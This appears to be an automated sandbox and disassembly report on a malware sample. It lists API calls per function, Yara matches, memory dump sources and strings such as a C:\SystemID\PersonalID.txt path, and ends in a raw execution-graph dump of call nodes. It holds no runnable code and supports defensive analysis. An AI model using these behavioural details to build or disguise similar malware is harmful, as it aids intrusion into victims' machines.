                                                                                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1421093161-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00C570AB
                                                                                                                                                                          • Part of subcall function 00C577A0: ___BuildCatchObjectHelper.LIBCMT ref: 00C577D2
                                                                                                                                                                          • Part of subcall function 00C577A0: ___AdjustPointer.LIBCMT ref: 00C577E9
                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00C570C2
                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00C570D4
                                                                                                                                                                        • CallCatchBlock.LIBCMT ref: 00C570F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB5007: __getptd_noexit.LIBCMT ref: 00BB5008
                                                                                                                                                                          • Part of subcall function 00BB5007: __amsg_exit.LIBCMT ref: 00BB5015
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00BB5A01
                                                                                                                                                                          • Part of subcall function 00BB8C96: __calloc_impl.LIBCMT ref: 00BB8CA5
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5A37
                                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00BB5A43
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5A57
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2580527540-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 00BA27B9
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA27C3
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA27CE
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00BA27E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 00BA2806
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA2814
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA281F
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00BA2832
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00BAB1BA
                                                                                                                                                                          • Part of subcall function 00BA11C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 00BA120F
                                                                                                                                                                          • Part of subcall function 00BA11C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00BA1228
                                                                                                                                                                          • Part of subcall function 00BA11C0: CloseHandle.KERNEL32(00000000), ref: 00BA123D
                                                                                                                                                                          • Part of subcall function 00BA11C0: MoveFileW.KERNEL32(?,?), ref: 00BA1277
                                                                                                                                                                          • Part of subcall function 00BABA10: LoadCursorW.USER32(00000000,00007F00), ref: 00BABA4A
                                                                                                                                                                          • Part of subcall function 00BABA10: RegisterClassExW.USER32(00000030), ref: 00BABA73
                                                                                                                                                                          • Part of subcall function 00BABA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00BABAAD
                                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BAB4B3
                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00BAB4CD
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAB4D7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                                        • API String ID: 441990211-897913220
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                                                                                        • API String ID: 2102423945-294840303
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BA3CA0
                                                                                                                                                                          • Part of subcall function 00BB3B4C: _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA3C83
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2590308727-54166481
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00BB0E13
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __calloc_crt
                                                                                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                                                                        • API String ID: 3494438863-969893948
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00C10686
                                                                                                                                                                          • Part of subcall function 00BE4C00: _raise.LIBCMT ref: 00BE4C18
                                                                                                                                                                        Strings
                                                                                                                                                                        • .\crypto\evp\digest.c, xrefs: 00C10638
                                                                                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00C1062E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset_raise
                                                                                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                                                                                        • Opcode ID: 32ec546d98c41d3935baa6bd1a205643af333bcb26953fd5a2ecaae3244242cd
                                                                                                                                                                        • Instruction ID: 77a43228e8f1018fab35f714dd25c5014fe4b4c519b5b4bc633e86866c4ff27f
                                                                                                                                                                        • Opcode Fuzzy Hash: 32ec546d98c41d3935baa6bd1a205643af333bcb26953fd5a2ecaae3244242cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 43014B75600200AFC310DF48EC42E6AB7E5AFC9304F294468F988DB362D7A1ED95DB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:6.4%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:14.6%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:190
calls 40728->40729 40732 2f3ff0 59 API calls 40728->40732 40733 2f2900 60 API calls 40728->40733 40734 2f3580 59 API calls 40728->40734 40730 2f0ae0 SetErrorMode PathFileExistsA SetErrorMode 40729->40730 40730->40728 40731 2f0b0c GetDriveTypeA 40730->40731 40731->40728 40732->40728 40733->40728 40734->40728 40736 2fd3c0 59 API calls 40735->40736 40737 2fc347 40736->40737 40738 2fc35b 40737->40738 40739 32f23e 59 API calls 40737->40739 40738->40282 40740 2fc37a 40739->40740 40740->40282 40742 2fd340 59 API calls 40741->40742 40743 2fc257 40742->40743 40744 2fc26b 40743->40744 40745 32f23e 59 API calls 40743->40745 40744->40282 40746 2fc28a 40745->40746 40746->40282 40748 2fb8d6 40747->40748 40750 2fb8e0 40747->40750 40749 2f4690 59 API calls 40748->40749 40749->40750 40751 2fb916 40750->40751 40752 2f4690 59 API calls 40750->40752 40753 2fb930 40751->40753 40754 2f4690 59 API calls 40751->40754 40752->40751 40755 2fb94a 40753->40755 40756 2f4690 59 API calls 40753->40756 40754->40753 40757 2fb964 40755->40757 40758 2f4690 59 API calls 40755->40758 40756->40755 41846 2fbfd0 40757->41846 40758->40757 40760 2fb976 40761 2fbfd0 59 API calls 40760->40761 40762 2fb988 40761->40762 40763 2fbfd0 59 API calls 40762->40763 40764 2fb99a 40763->40764 40765 2fb9b4 40764->40765 40766 2f4690 59 API calls 40764->40766 40767 2fb9f2 40765->40767 40768 2f3ff0 59 API calls 40765->40768 40766->40765 40767->40282 40768->40767 40770 2f326f 40769->40770 40771 2f327d 40769->40771 40772 2f5c10 59 API calls 40770->40772 40774 2f5c10 59 API calls 40771->40774 40773 2f3278 40772->40773 40773->40282 40775 2f329c 40774->40775 40775->40282 40776->40282 41867 2ff130 timeGetTime 40776->41867 40777->40262 42067 2ffd80 40777->42067 40778->40035 40780 2f1af4 40779->40780 40781 2f1ad0 40779->40781 40780->40080 40782 2f1afc 40781->40782 40783 2f1adc DispatchMessageW PeekMessageW 40781->40783 40782->40080 40783->40780 40783->40781 40785 2f478c 40784->40785 40786 2f46a9 40784->40786 42081 32f26c 59 API 
calls 3 library calls 40785->42081 40788 2f46e9 40786->40788 40789 2f46b6 40786->40789 40792 2f46f5 40788->40792 40793 2f47a0 40788->40793 40790 2f4796 40789->40790 40791 2f46c2 40789->40791 42082 32f26c 59 API calls 3 library calls 40790->42082 42080 2f3340 59 API calls _memmove 40791->42080 40796 2f6950 59 API calls 40792->40796 40803 2f4707 _signal 40792->40803 40795 32f23e 59 API calls 40793->40795 40797 2f47aa 40795->40797 40796->40803 40798 2f47bf 40797->40798 40799 2f47cd 40797->40799 40801 2f5c10 59 API calls 40798->40801 40805 2f5c10 59 API calls 40799->40805 40804 2f47c8 40801->40804 40802 2f46e0 40802->40077 40803->40077 40804->40077 40806 2f47ec 40805->40806 40806->40077 40807->40102 40808->40081 40809->40223 40810->40255 42083 310cfc 58 API calls std::exception::_Copy_str 40811->42083 40813 32f256 42084 310eca RaiseException 40813->42084 40815 32f26b 40817 2f5735 40816->40817 40822 2f56de 40816->40822 40818 2f573e 40817->40818 40819 2f57bc 40817->40819 40821 2f5750 _signal 40818->40821 40837 2f6760 59 API calls 2 library calls 40818->40837 40820 32f23e 59 API calls 40819->40820 40823 2f57c6 40820->40823 40821->40359 40822->40817 40827 2f5704 40822->40827 40825 2f57db 40823->40825 40838 32f26c 59 API calls 3 library calls 40823->40838 40825->40359 40829 2f571f 40827->40829 40830 2f5709 40827->40830 40828 2f5806 40832 2f3ff0 59 API calls 40829->40832 40831 2f3ff0 59 API calls 40830->40831 40833 2f5719 40831->40833 40834 2f572f 40832->40834 40833->40359 40834->40359 40835->40363 40836->40358 40837->40821 40838->40828 40845 303b4c 40839->40845 40841 2fccca 40842 2fa00a 40841->40842 40855 32f1bb 59 API calls 3 library calls 40841->40855 40842->40037 40842->40038 40847 303b54 40845->40847 40846 300c62 _malloc 58 API calls 40846->40847 40847->40846 40848 303b6e 40847->40848 40850 303b72 std::exception::exception 40847->40850 40856 30793d DecodePointer 40847->40856 40848->40841 40857 310eca RaiseException 40850->40857 40852 303b9c 40858 310d91 58 API calls 
_free 40852->40858 40854 303bae 40854->40841 40856->40847 40857->40852 40858->40854 40860 303b4c 59 API calls 40859->40860 40861 2fcc5d 40860->40861 40864 2fcc64 40861->40864 40866 32f1bb 59 API calls 3 library calls 40861->40866 40864->40371 40865 2fd740 59 API calls 40864->40865 40865->40371 40869 2f5dfe 40868->40869 40870 2f5d66 40868->40870 40871 32f23e 59 API calls 40869->40871 40877 2f5d84 _signal 40870->40877 40879 2f6950 40870->40879 40873 2f5e08 40871->40873 40875 32f23e 59 API calls 40873->40875 40874 2f5d76 40874->40388 40876 2f5e1a 40875->40876 40876->40388 40877->40388 40878->40388 40880 2f6986 40879->40880 40881 2f69d3 40880->40881 40882 303b4c 59 API calls 40880->40882 40884 2f6a0d _signal 40880->40884 40881->40884 40888 32f1bb 59 API calls 3 library calls 40881->40888 40882->40881 40884->40874 40892 311570 40889->40892 40895 311580 40892->40895 40893 311586 40894 305208 __wopenfile 58 API calls 40893->40894 40896 31158b 40894->40896 40895->40893 40899 3115ae 40895->40899 40903 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 40896->40903 40901 3115cf wcstoxq 40899->40901 40904 30e883 GetStringTypeW 40899->40904 40900 2fa36e lstrcpyW lstrcpyW 40900->40072 40901->40900 40902 305208 __wopenfile 58 API calls 40901->40902 40902->40900 40903->40900 40904->40899 40906 2f1cf2 RegOpenKeyExW 40905->40906 40906->40395 40906->40413 40908 2f4690 59 API calls 40907->40908 40909 2f3550 40908->40909 40909->40406 40911 3002b6 40910->40911 40912 300241 40910->40912 40921 3002c8 60 API calls 3 library calls 40911->40921 40914 305208 __wopenfile 58 API calls 40912->40914 40919 300266 40912->40919 40916 30024d 40914->40916 40915 3002c3 40915->40442 40920 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 40916->40920 40918 300258 40918->40442 40919->40442 40920->40918 40921->40915 40922->40468 40923->40469 40924->40464 40926 300c62 _malloc 58 API calls 40925->40926 40927 2ee684 40926->40927 40928 300c62 _malloc 58 API calls 40927->40928 40929 2ee690 
40928->40929 40930 2ee699 40929->40930 40931 2ee6b4 GetAdaptersInfo 40929->40931 40932 301f2d _wprintf 85 API calls 40930->40932 40933 2ee6db GetAdaptersInfo 40931->40933 40934 2ee6c4 40931->40934 40936 2ee6a3 40932->40936 40935 2ee6ea 40933->40935 40950 2ee741 40933->40950 40937 300bed _free 58 API calls 40934->40937 40975 3004a6 40935->40975 40940 300bed _free 58 API calls 40936->40940 40938 2ee6ca 40937->40938 40942 300c62 _malloc 58 API calls 40938->40942 40944 2ee6a9 40940->40944 40941 300bed _free 58 API calls 40945 2ee74a 40941->40945 40946 2ee6d2 40942->40946 40944->40472 40945->40472 40946->40930 40946->40933 40948 2ee737 40949 301f2d _wprintf 85 API calls 40948->40949 40949->40950 40950->40941 40952 2f56d0 59 API calls 40951->40952 40953 2ee8bb CryptAcquireContextW 40952->40953 40954 2ee8d8 40953->40954 40955 2ee8e9 CryptCreateHash 40953->40955 41214 310eca RaiseException 40954->41214 40957 2ee914 CryptHashData 40955->40957 40958 2ee903 40955->40958 40959 2ee932 40957->40959 40960 2ee943 CryptGetHashParam 40957->40960 41215 310eca RaiseException 40958->41215 41216 310eca RaiseException 40959->41216 40963 2ee963 40960->40963 40965 2ee974 _memset 40960->40965 41217 310eca RaiseException 40963->41217 40966 2ee993 CryptGetHashParam 40965->40966 40967 2ee9a8 40966->40967 40973 2ee9b9 40966->40973 41218 310eca RaiseException 40967->41218 40969 2eea10 40971 2eea16 CryptDestroyHash CryptReleaseContext 40969->40971 40970 3004a6 _sprintf 83 API calls 40970->40973 40972 2eea33 40971->40972 40972->40478 40973->40969 40973->40970 40974 2f3ea0 59 API calls 40973->40974 40974->40973 40976 3004c2 40975->40976 40977 3004d7 40975->40977 40978 305208 __wopenfile 58 API calls 40976->40978 40977->40976 40979 3004de 40977->40979 40980 3004c7 40978->40980 41004 306ab6 40979->41004 41003 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 40980->41003 40983 300504 40984 2ee725 40983->40984 41028 3064ef 78 API calls 6 library calls 40983->41028 40986 301f2d 40984->40986 40987 
301f39 _raise 40986->40987 40988 301f4a 40987->40988 40989 301f5f __stbuf 40987->40989 40990 305208 __wopenfile 58 API calls 40988->40990 41063 300e92 40989->41063 40991 301f4f 40990->40991 41079 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 40991->41079 40994 301f6f __stbuf 41068 30afd2 40994->41068 40995 301f5a _raise 40995->40948 40997 301f82 __stbuf 40998 306ab6 __output_l 83 API calls 40997->40998 40999 301f9b __stbuf 40998->40999 41075 30afa1 40999->41075 41003->40984 41029 30019c 41004->41029 41007 305208 __wopenfile 58 API calls 41008 306b30 41007->41008 41009 307601 41008->41009 41024 306b50 __aulldvrm __woutput_s_l _strlen 41008->41024 41044 30816b 41008->41044 41010 305208 __wopenfile 58 API calls 41009->41010 41011 307606 41010->41011 41052 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41011->41052 41013 3075db 41037 30a77e 41013->41037 41016 3075fd 41016->40983 41018 30766a 78 API calls _write_multi_char 41018->41024 41019 3071b9 DecodePointer 41019->41024 41020 300bed _free 58 API calls 41020->41024 41021 31adf7 60 API calls __cftof 41021->41024 41022 308cde __malloc_crt 58 API calls 41022->41024 41023 30721c DecodePointer 41023->41024 41024->41009 41024->41013 41024->41018 41024->41019 41024->41020 41024->41021 41024->41022 41024->41023 41025 307241 DecodePointer 41024->41025 41026 3076b2 78 API calls _write_multi_char 41024->41026 41027 3076de 78 API calls _write_string 41024->41027 41051 302bcc 58 API calls _LocaleUpdate::_LocaleUpdate 41024->41051 41025->41024 41026->41024 41027->41024 41028->40984 41030 3001ad 41029->41030 41036 3001fa 41029->41036 41053 305007 41030->41053 41032 3001b3 41033 3001da 41032->41033 41058 3045dc 58 API calls 6 library calls 41032->41058 41033->41036 41059 30495e 58 API calls 6 library calls 41033->41059 41036->41007 41038 30a786 41037->41038 41039 30a788 IsProcessorFeaturePresent 41037->41039 41038->41016 41041 30ab9c 41039->41041 41061 30ab4b 5 API calls ___raise_securityfailure 41041->41061 41043 
30ac7f 41043->41016 41045 308175 41044->41045 41046 30818a 41044->41046 41047 305208 __wopenfile 58 API calls 41045->41047 41046->41024 41048 30817a 41047->41048 41062 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41048->41062 41050 308185 41050->41024 41051->41024 41052->41013 41054 30501f __getptd_noexit 58 API calls 41053->41054 41055 30500d 41054->41055 41056 30501a 41055->41056 41060 307c2e 58 API calls 3 library calls 41055->41060 41056->41032 41058->41033 41059->41036 41061->41043 41062->41050 41064 300eb3 EnterCriticalSection 41063->41064 41065 300e9d 41063->41065 41064->40994 41066 308af7 __lock 58 API calls 41065->41066 41067 300ea6 41066->41067 41067->40994 41069 30816b __input_l 58 API calls 41068->41069 41070 30afdf 41069->41070 41081 3189c2 41070->41081 41072 30afe5 __stbuf 41073 30b034 41072->41073 41074 308cde __malloc_crt 58 API calls 41072->41074 41073->40997 41074->41073 41076 301faf 41075->41076 41077 30afaa 41075->41077 41080 301fc9 LeaveCriticalSection LeaveCriticalSection __stbuf __getstream 41076->41080 41077->41076 41091 30836b 41077->41091 41079->40995 41080->40995 41082 3189da 41081->41082 41083 3189cd 41081->41083 41086 3189e6 41082->41086 41087 305208 __wopenfile 58 API calls 41082->41087 41084 305208 __wopenfile 58 API calls 41083->41084 41085 3189d2 41084->41085 41085->41072 41086->41072 41088 318a07 41087->41088 41090 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41088->41090 41090->41085 41092 30837e 41091->41092 41096 3083a2 41091->41096 41093 30816b __input_l 58 API calls 41092->41093 41092->41096 41094 30839b 41093->41094 41097 30df14 41094->41097 41096->41076 41098 30df20 _raise 41097->41098 41099 30df2d 41098->41099 41101 30df44 41098->41101 41197 3051d4 58 API calls __getptd_noexit 41099->41197 41100 30dfe3 41201 3051d4 58 API calls __getptd_noexit 41100->41201 41101->41100 41103 30df58 41101->41103 41106 30df80 41103->41106 41107 30df76 41103->41107 41105 30df32 41109 305208 __wopenfile 58 API calls 
41105->41109 41125 31b134 41106->41125 41198 3051d4 58 API calls __getptd_noexit 41107->41198 41108 30df7b 41113 305208 __wopenfile 58 API calls 41108->41113 41120 30df39 _raise 41109->41120 41112 30df86 41114 30df99 41112->41114 41115 30dfac 41112->41115 41116 30dfef 41113->41116 41134 30e003 41114->41134 41119 305208 __wopenfile 58 API calls 41115->41119 41202 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41116->41202 41122 30dfb1 41119->41122 41120->41096 41121 30dfa5 41200 30dfdb LeaveCriticalSection __unlock_fhandle 41121->41200 41199 3051d4 58 API calls __getptd_noexit 41122->41199 41126 31b140 _raise 41125->41126 41127 31b18f EnterCriticalSection 41126->41127 41128 308af7 __lock 58 API calls 41126->41128 41130 31b1b5 _raise 41127->41130 41129 31b165 41128->41129 41131 31b17d 41129->41131 41203 31263e InitializeCriticalSectionAndSpinCount 41129->41203 41130->41112 41204 31b1b9 LeaveCriticalSection _doexit 41131->41204 41135 30e010 __ftell_nolock 41134->41135 41136 30e06e 41135->41136 41137 30e04f 41135->41137 41168 30e044 41135->41168 41142 30e0c6 41136->41142 41143 30e0aa 41136->41143 41205 3051d4 58 API calls __getptd_noexit 41137->41205 41139 30a77e __atoldbl_l 6 API calls 41140 30e864 41139->41140 41140->41121 41141 30e054 41144 305208 __wopenfile 58 API calls 41141->41144 41145 30e0df 41142->41145 41209 30f744 60 API calls 3 library calls 41142->41209 41207 3051d4 58 API calls __getptd_noexit 41143->41207 41147 30e05b 41144->41147 41149 3189c2 __stbuf 58 API calls 41145->41149 41206 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41147->41206 41152 30e0ed 41149->41152 41150 30e0af 41153 305208 __wopenfile 58 API calls 41150->41153 41154 30e446 41152->41154 41159 305007 _TestDefaultLanguage 58 API calls 41152->41159 41155 30e0b6 41153->41155 41157 30e464 41154->41157 41158 30e7d9 WriteFile 41154->41158 41208 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41155->41208 41160 30e588 41157->41160 41166 30e47a 41157->41166 41161 30e439 
